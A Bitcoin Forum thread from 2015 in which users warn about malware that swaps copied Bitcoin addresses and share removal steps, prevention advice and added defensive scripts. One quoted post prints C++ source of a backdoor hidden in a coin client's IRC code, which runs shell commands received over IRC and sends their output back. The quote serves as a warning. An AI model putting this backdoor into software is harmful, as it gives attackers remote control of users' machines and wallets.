Bitcoin Forum

Bitcoin => Bitcoin Discussion => Topic started by: Hailedllama on August 31, 2015, 02:25:54 PM

Title: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 02:25:54 PM
I recently found a malware that changes bitcoin addresses when copied to the hacker's address, so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 02:42:57 PM
it happened to me about an hour ago but here's a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described in the first point you can't delete one of the folders.
If you've deleted the Adobe folder it won't start again on your computer, so you're good, but to completely remove it you have to do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

Title: Re: Bitcoin Malware
Post by: Snorek on August 31, 2015, 03:25:11 PM
it happened to me about an hour ago but here's a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described in the first point you can't delete one of the folders.
If you've deleted the Adobe folder it won't start again on your computer, so you're good, but to completely remove it you have to do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin
You mean that you can have your own version of this Malware with your own address for $1. That's sick. I was worried about new kind of malwares and viruses associated with bitcoin and here they are.
So far I know about this malware changing addresses and another that encodes data on your disks and then wants bitcoin to decipher it. New technologies, new threats.

Title: Re: Bitcoin Malware
Post by: Aggressor66 on August 31, 2015, 03:37:18 PM
Malwarebytes’ Anti-Malware is currently one of the most successful tools at identifying and removing the types of malware that we’re talking about here.
It’s not really a replacement for anti-virus software but in cases of infection, it has a pretty darn good track record.
Download the free version, install and run it, and then see what it turns up.

Title: Re: Bitcoin Malware
Post by: LiteCoinGuy on August 31, 2015, 03:47:50 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Title: Re: Bitcoin Malware
Post by: tadakaluri on August 31, 2015, 04:17:57 PM
it happened to me about an hour ago but here's a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described in the first point you can't delete one of the folders.
If you've deleted the Adobe folder it won't start again on your computer, so you're good, but to completely remove it you have to do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

Thank you very much for the valuable information. I need to check my PC and gadgets: are they already infected with this malware or not? Once again thank you very much for this information.

Title: Re: Bitcoin Malware
Post by: nero987 on August 31, 2015, 04:23:44 PM
This has been around for some time already...
It first came up on Evo market around 1 month before the exit scam.
I have the source code of v1.3 here.
Before you compile the malware you set some parameters, which include the process name.
In Snorek's "examples" it's Chrome32.exe or AcroRd32.exe, but it can be literally anything.

About anti malware:
The program does not make any connection to the internet, for this reason it is almost never picked up by anti-virus/malware software.
When a particular compilation of the malware (with particular process name) is reported to an antivirus database, only that version will be picked up by av's...
There are some av's that notice that part of the code is comparable to known malware, but that's only a minority of the av's....

damn, practice your english nero!

edit: I'm not selling/sharing the source code, nor sharing any detailed information on how it actually works!

Title: Re: Bitcoin Malware
Post by: ikydesu on August 31, 2015, 07:32:07 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

There is a lot of malware out there that comes from bitcoin-related services. I personally always check and scan the site first when I want to visit, especially a site which looks strange or fishy to me. Here are some tips to make your PC secure and avoid any virus/malware:

Title: Re: Bitcoin Malware
Post by: Mickeyb on August 31, 2015, 08:33:38 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Doesn't this malware work even if you use a Trezor for example? I guess that people should be always careful and double check. MyTrezor Web wallet works in the browser as well.

The truth of the matter is that everybody should be double checking whether addresses have been changed. If anybody can have a copy of this malware for $1, this means that this malware can become very widespread.

Title: Re: Bitcoin Malware
Post by: Meuh6879 on August 31, 2015, 08:38:48 PM
Chrome is the malware.

it seems logical ...  ;D

Title: Re: Bitcoin Malware
Post by: Gyfts on August 31, 2015, 08:45:38 PM
Important to note that there are countless types of malware that can infect your PC and steal your wallet. A virus that copies and pastes the wrong address seems like something that would be easy to catch, at least for me as I double check addresses before sending. Keyloggers are probably the most notable for taking people's bitcoin, or RATs. Both make it very easy to steal Bitcoin while the owner of the wallet is away from their computer and unaware of their PC being infected.

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 09:49:24 PM
I'm glad I could help everyone, but just because your internet security says it's ok, still be cautious because there are ways around internet security. There is a lot of software like this being sold for like $2-$5, some even give it out for free, so be careful

Title: Re: Bitcoin Malware
Post by: Carlton Banks on August 31, 2015, 09:58:17 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 10:01:33 PM
I would love to use Linux but my wifi stick doesn't have the drivers for Linux

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 10:08:03 PM
Damn that looks good, I would buy it but I just lost my money to this stupid malware  >:(

Title: Re: Bitcoin Malware
Post by: Carlton Banks on August 31, 2015, 10:19:37 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Yes, Mint is excellent for new Linux users, it's really easy to install and is very forgiving when it comes to using peripherals with it. At least compared to other Linux distros anyway.

Be careful everybody with Linux if you have a brand new, latest Intel chip computer. Sometimes the newest hardware isn't supported properly yet, so either wait till the hardware is 6 months or so old, or wait that long till you try Linux on it. Or you could be brave  :D It is a brave move, though.

Title: Re: Bitcoin Malware
Post by: Jeremycoin on August 31, 2015, 10:41:32 PM
Wow that could be a serious problem, but I always checked twice when I want to send a Bitcoin.

Title: Re: Bitcoin Malware
Post by: zero01 on August 31, 2015, 10:49:13 PM
thank you for the information you provided
I would be more careful

Title: Re: Bitcoin Malware
Post by: rinhunter on August 31, 2015, 10:53:06 PM
Wow that could be a serious problem, but I always checked twice when I want to send a Bitcoin.

Great, so we as users have to remain cautious.
very serious, for those who frequently send BTC in large amount.

Title: Re: Bitcoin Malware
Post by: Coinshot on August 31, 2015, 11:42:25 PM
Just wanted to add this: sometimes malware makes additional registry entries in both "CurrentVersion\Run" and "CurrentVersion\RunOnce".
So it's best to check both, because one can copy the instance back to every registry entry, forcing you back to square one.
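
A check along the lines of this post and the removal guide earlier in the thread, as an added example that is not part of the original posts: it parses `reg query` output for the Run and RunOnce keys of both hives and flags autorun entries that point at the folders and process names named in the thread. The sample output, the user name and the generic "(x86)" folder heuristic are constructed assumptions.

```python
import re
from ntpath import basename  # Windows path rules, importable on any OS

# Constructed sample: `reg query` output for the four autorun keys.
# User name, value names and the benign entries are made up for this example.
SAMPLE_REG_QUERY = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Adobe Update    REG_SZ    C:\Users\alice\AppData\Roaming\Adobe (x86)\AcroRd32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
    Google Update    REG_SZ    "C:\Users\alice\AppData\Local\Google (x86)\Chrome32.exe"

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
'''

# Indicators taken from the thread. The process name is a build-time setting,
# so a name match alone is weak; the location checks carry most of the weight.
THREAD_FOLDERS = (r"\appdata\roaming\adobe (x86)", r"\appdata\local\google (x86)")
THREAD_NAMES = {"chrome32.exe", "acrord32.exe"}

# Assumption (not from the thread): any "<vendor> (x86)" folder directly under
# AppData\Roaming or AppData\Local is treated as a vendor look-alike.
LOOKALIKE_DIR = re.compile(r"\\appdata\\(?:roaming|local)\\[^\\]+ \(x86\)\\", re.I)

VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")
EXE_PATH = re.compile(r'^"(?P<q>[^"]+)"|^(?P<u>.+?\.exe)\b', re.I)


def parse_reg_query(text):
    """Yield (key, value_name, data) for every value line in `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := VALUE_LINE.match(line)):
            yield key, m["name"], m["data"]


def executable_of(data):
    """Extract the program path from an autorun command line (quoted or not)."""
    m = EXE_PATH.match(data.strip())
    if not m:
        return data.strip()
    return m["q"] or m["u"]


def audit_autoruns(text):
    """Return autorun entries that match the thread's indicators, with reasons."""
    findings = []
    for key, name, data in parse_reg_query(text):
        path = executable_of(data)
        low = path.lower()
        reasons = []
        if any(folder in low for folder in THREAD_FOLDERS):
            reasons.append("folder named in the thread")
        elif LOOKALIKE_DIR.search(low):
            reasons.append("vendor look-alike folder under AppData")
        if basename(low) in THREAD_NAMES and "\\program files" not in low:
            reasons.append("process name from the thread outside Program Files")
        if reasons:
            findings.append({"key": key, "value": name, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_REG_QUERY):
        print(f["key"], "|", f["value"], "|", f["path"], "|", "; ".join(f["reasons"]))
```

On a real machine the input would be the saved output of `reg query` for each of the four keys; an entry that reappears after deletion is the situation the post describes.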

Title: Re: Bitcoin Malware
Post by: cellard on August 31, 2015, 11:54:44 PM
So can someone tell me what the source of the malware is? Is it something that infects Chrome? In that case I'm safe? I use Mozilla Firefox. Thanks for the heads up anyway.

Title: Re: Bitcoin Malware
Post by: Habeler876 on September 01, 2015, 12:04:45 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

I can't say for sure in this case, but mostly people get infected with malware bound to some legit .exe, or via Java-drive-by. In either case both browsers are not to blame,
since it's not an exploit of sorts, but rather a diversion (jdb mostly asks you to update codecs, or update java version.. etc)

Title: Re: Bitcoin Malware
Post by: maokoto on September 01, 2015, 01:07:40 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

Title: Re: Bitcoin Malware
Post by: RGBKey on September 01, 2015, 01:10:14 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 01:11:27 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

Don't just check the address you're sending to, check the change address for that transaction also, it too can be substituted for an attacker's address.

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 06:17:27 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names than "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an address is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.
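
Why a glance at the first few characters does not catch this, as an added example that is not code from the thread or from the malware: the substituted address is itself a well-formed Base58Check address, so only a full comparison against what was copied detects it. The addresses are constructed from made-up 20-byte hashes and the function names are hypothetical.

```python
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _checksum(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]


def b58check_encode(version: int, payload: bytes) -> str:
    """Encode version byte + payload + 4-byte checksum as Base58."""
    raw = bytes([version]) + payload
    raw += _checksum(raw)
    n = int.from_bytes(raw, "big")
    digits = ""
    while n:
        n, r = divmod(n, 58)
        digits = B58[r] + digits
    zeros = len(raw) - len(raw.lstrip(b"\0"))  # leading zero bytes become '1'
    return "1" * zeros + digits


def b58check_valid(addr: str) -> bool:
    """True if addr decodes to 25 bytes whose last 4 are the right checksum."""
    n = 0
    for ch in addr:
        i = B58.find(ch)
        if i < 0:
            return False
        n = n * 58 + i
    zeros = len(addr) - len(addr.lstrip("1"))
    raw = b"\0" * zeros + n.to_bytes((n.bit_length() + 7) // 8, "big")
    return len(raw) == 25 and _checksum(raw[:-4]) == raw[-4:]


def common_prefix_len(a: str, b: str) -> int:
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def glance_check(copied: str, pasted: str, n: int = 3) -> bool:
    """The insufficient habit: compare only the first n characters."""
    return copied[:n] == pasted[:n]


def verify_paste(copied: str, pasted: str) -> str:
    """Classify a pasted address against the one that was copied."""
    copied, pasted = copied.strip(), pasted.strip()
    if pasted == copied:
        return "ok"
    if not b58check_valid(pasted):
        return "corrupted"  # typo or truncation: the checksum catches these
    # A valid but different address: the checksum cannot help here.
    if common_prefix_len(copied, pasted) >= 3:  # lower bound given in the thread
        return "substituted-lookalike"
    return "substituted"


# Constructed test data (no real wallets): three made-up hashes.
_HASH = bytes(range(1, 21))
COPIED = b58check_encode(0x00, _HASH)
# Same leading 6 hash bytes, different tail: stands in for the look-alike.
LOOKALIKE = b58check_encode(0x00, _HASH[:6] + bytes(range(100, 114)))
UNRELATED = b58check_encode(0x00, bytes(range(200, 220)))

if __name__ == "__main__":
    for label, pasted in (("same", COPIED), ("look-alike", LOOKALIKE),
                          ("unrelated", UNRELATED), ("truncated", COPIED[:-1])):
        print(f"{label:10} glance={glance_check(COPIED, pasted)!s:5} "
              f"full={verify_paste(COPIED, pasted)}")
```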

Title: Re: Bitcoin Malware
Post by: S4VV4S on September 01, 2015, 07:32:15 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better ;)

Title: Re: Bitcoin Malware
Post by: flock123 on September 01, 2015, 07:48:50 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better ;)
I also think that, if we want to avoid such malware, we must also have a strong security system on our computer

Title: Re: Bitcoin Malware
Post by: neoneros on September 01, 2015, 08:42:31 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

it is, but sometimes you need to pay for something online, you need to copy the addresses, it might be easier to check and find the flaw, but it is still a risk that the address you are sending to is changed when copy-pasted.

Thanks for the warning, do scan my devices regularly, not just for the bitcoin, better safe than sorry.

Title: Re: Bitcoin Malware
Post by: RustyNomad on September 01, 2015, 08:52:23 AM
Thanks to OP for the warning and reminding us that we are all targets in one way or another.

Guess we will see more and more of this kind of malware and even more so when the bitcoin price is high again.

Just glad I'm using a Trezor but there are still times where I just copy an address from Electrum (Trezor watch only wallet) to paste it into a website. Will make a point in future to double check addresses and not just the first 3 and last 3 characters as I usually do.

Title: Re: Bitcoin Malware
Post by: louise123 on September 01, 2015, 08:55:34 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 10:54:02 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Like I've mentioned above, this particular piece of malware is mostly distributed through pdf's...

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 11:37:01 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Like I've mentioned above, this particular piece of malware is mostly distributed through pdf's...

There's a safe .pdf reader in the OS I use ( It converts the vector data in the .pdf into a bitmap, and deletes the original .pdf, along with all the scripting that can secrete any malware. Linux only.  

Title: Re: Bitcoin Malware
Post by: Amph on September 01, 2015, 11:40:24 AM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, I still have my hot wallet intact, for years, and no malware has stolen anything from my desktop

malware do not infect your pc without you doing something wrong

Title: Re: Bitcoin Malware
Post by: NeuroticFish on September 01, 2015, 11:43:53 AM
Chrome is the malware.

it seems logical ...  ;D

You made me doublecheck :)
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.

But really, the ones who run windoze with no antivirus on... they just ask for it.

Title: Re: Bitcoin Malware
Post by: medUSA on September 01, 2015, 11:53:15 AM
As bitcoin grows in popularity, more of these malware will creep up to steal your coins. I believe a dedicated machine (PC or phone) for bitcoin with nothing else installed is the only way out of this. If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. :-[

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 11:56:10 AM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, I still have my hot wallet intact, for years, and no malware has stolen anything from my desktop

malware do not infect your pc without you doing something wrong

Feeling confident about opening .pdfs? Or browsing unknown websites?

I've only got 1 PC (well, and a Raspberry Pi), it seems like overkill to have a separate PC just for bitcoin, but I guess it's been successful in keeping your coins safe.

If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. :-[

Not with the Trezor hardware wallet. It has a screen that displays the address you're sending to before you sign the transaction.

Title: Re: Bitcoin Malware
Post by: lite on September 01, 2015, 12:21:57 PM
Linux is the best if you want protection against malware. Also if you're doing larger transaction it's recommended to use live Linux OS from your USB. I prefer to use Ubuntu, but there are lots of other Linux OS one can choose. ;)

Title: Re: Bitcoin Malware
Post by: mallard on September 01, 2015, 12:22:58 PM
Do any of the popular virus scanners detect this?

Title: Re: Bitcoin Malware
Post by: XCASH on September 01, 2015, 12:40:46 PM
Do any of the popular virus scanners detect this?

I don't know, but you can't always rely on virus scanners to detect something. The quote below is stickied at the top of the alt coin board, but some of it also applies to Bitcoin. Hackers can make crypted malware that virus scanners don't detect.

Also hackers can code apparently useful legit software that uses such simple techniques to steal wallets that it goes undetected by virus scanners. It's obvious from the source code that there's wallet stealing code there, but very few people read source code before using software.

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

here is the source code with macros resolved:

    // An IRC PRIVMSG whose text starts with the word "!" is treated as a command.
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // Everything from vWords[4] onward is handed to popen(), i.e. run by the shell.
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            // Extract the sender's nick from the ":nick!user@host" prefix.
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // The command's output is sent back to that nick.
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
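
One way to catch the trick described in the quoted post during source review, as an added example that is not from the post or from the coin's code base: expand object-like `#define` aliases and flag call sites that resolve to a process-execution function. The `#define` lines in the sample are constructed from the two listings above, and the function list is an assumption, not exhaustive.

```python
import re

# Constructed sample: the #define lines are inferred from the before/after
# listings in the post (CBuff -> "PRIVMSG", CLine -> FILE, CRead -> popen);
# the call line is the one quoted there.
SAMPLE_SOURCE = r'''
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
}
'''

# Functions that start another program (assumed list; extend per code base).
EXEC_FUNCS = {
    "popen", "_popen", "system",
    "execl", "execlp", "execle", "execv", "execvp", "execve",
    "WinExec", "ShellExecuteA", "ShellExecuteW",
    "CreateProcessA", "CreateProcessW",
}

# Object-like macros only: "#define NAME value". Function-like macros
# ("#define F(x) ...") do not match because '(' follows the name directly.
DEFINE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(.+?)\s*$")
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")


def collect_aliases(source):
    """Map each object-like macro name to its replacement text."""
    aliases = {}
    for line in source.splitlines():
        m = DEFINE.match(line)
        if m:
            aliases[m.group(1)] = m.group(2)
    return aliases


def resolve(name, aliases):
    """Follow alias chains (A -> B -> popen), guarding against cycles."""
    seen = set()
    while name in aliases and name not in seen:
        seen.add(name)
        name = aliases[name]
    return name


def find_exec_calls(source):
    """Return call sites that, after macro expansion, start another process."""
    aliases = collect_aliases(source)
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DEFINE.match(line):
            continue
        for m in CALL.finditer(line):
            written = m.group(1)
            actual = resolve(written, aliases)
            if actual in EXEC_FUNCS:
                findings.append({
                    "line": lineno,
                    "written": written,
                    "resolves_to": actual,
                    "hidden": written != actual,  # True when a macro hides it
                    "text": line.strip(),
                })
    return findings


def hidden_strings(source):
    """Macros that hide string literals, e.g. protocol keywords."""
    return {k: v for k, v in collect_aliases(source).items() if v.startswith('"')}


if __name__ == "__main__":
    for f in find_exec_calls(SAMPLE_SOURCE):
        tag = "HIDDEN" if f["hidden"] else "direct"
        print(f'{tag} line {f["line"]}: {f["written"]} -> {f["resolves_to"]}: {f["text"]}')
    print(hidden_strings(SAMPLE_SOURCE))
```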

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 12:41:39 PM
Do any of the popular virus scanners detect this?

If the particular version of the malware you received is not yet flagged by your av: No it doesn't.

This has been around for some time already...
It first came up on Evo market around 1 month before the exit scam.
I have the source code of v1.3 here.
Before you compile the malware you set some parameters, which include the process name.
In Snorek's "examples" it's Chrome32.exe or AcroRd32.exe, but it can be literally anything.

About anti malware:
The program does not make any connection to the internet, for this reason it is almost never picked up by anti-virus/malware software.
When a particular compilation of the malware (with particular process name) is reported to an antivirus database, only that version will be picked up by av's...
There are some av's that notice that part of the code is comparable to known malware, but that's only a minority of the av's....

damn, practice your english nero!

edit: I'm not selling/sharing the source code, nor sharing any detailed information on how it actually works!

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names than "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an address is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...

Title: Re: Bitcoin Malware
Post by: wearehatetherules on September 05, 2015, 04:45:40 AM
I never heard about this before, does that really exist?

Title: Re: Bitcoin Malware
Post by: ranochigo on September 05, 2015, 07:24:56 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names than "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an address is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...
Antiviruses usually check the application's signature and match it against their database. If it matches, the antivirus would flag it. This would require you to have the latest database download. I have to say the virus would be quite intensive to carry out on a large scale. If the address gets replaced with an address that has the first few characters identical to it, they need to generate a large amount of vanity addresses or even use the victim's computer to generate one and send the private key to the server. This has to be done at a fast pace unless a fake lag can be implemented when the address is being pasted.

Antivirus won't be foolproof and people can use a crypter to avoid detection by antiviruses.

Title: Re: Bitcoin Malware
Post by: Hopalong on September 05, 2015, 08:20:01 AM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi uses Intel drivers in Windows but it was produced by Broadcom so I had to get Broadcom drivers to get it working in Linux.

About Linux security... I have an old laptop with Ubuntu. It is formatted correctly with a partition for each user level and encrypted. I have lost the password and it is impossible to get in. No live CD can start and there is no way to get to the disks. Even a mini Linux on a USB stick can't read the disks.

Title: Re: Bitcoin Malware
Post by: mallard on September 05, 2015, 09:19:04 AM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi uses Intel drivers in Windows but it was produced by Broadcom so I had to get Broadcom drivers to get it working in Linux.

About Linux security... I have an old laptop with Ubuntu. It is formatted correctly with a partition for each user level and encrypted. I have lost the password and it is impossible to get in. No live CD can start and there is no way to get to the disks. Even a mini Linux on a USB stick can't read the disks.

Do you need to recover the files, or do you just want the laptop working again?
You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.

Title: Re: Bitcoin Malware
Post by: RealBitcoin on September 05, 2015, 01:12:30 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Title: Re: Bitcoin Malware
Post by: Hopalong on September 05, 2015, 01:56:06 PM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi uses Intel drivers in Windows but it was produced by Broadcom so I had to get Broadcom drivers to get it working in Linux.

About Linux security... I have an old laptop with Ubuntu. It is formatted correctly with a partition for each user level and encrypted. I have lost the password and it is impossible to get in. No live CD can start and there is no way to get to the disks. Even a mini Linux on a USB stick can't read the disks.

Do you need to recover the files, or do you just want the laptop working again?
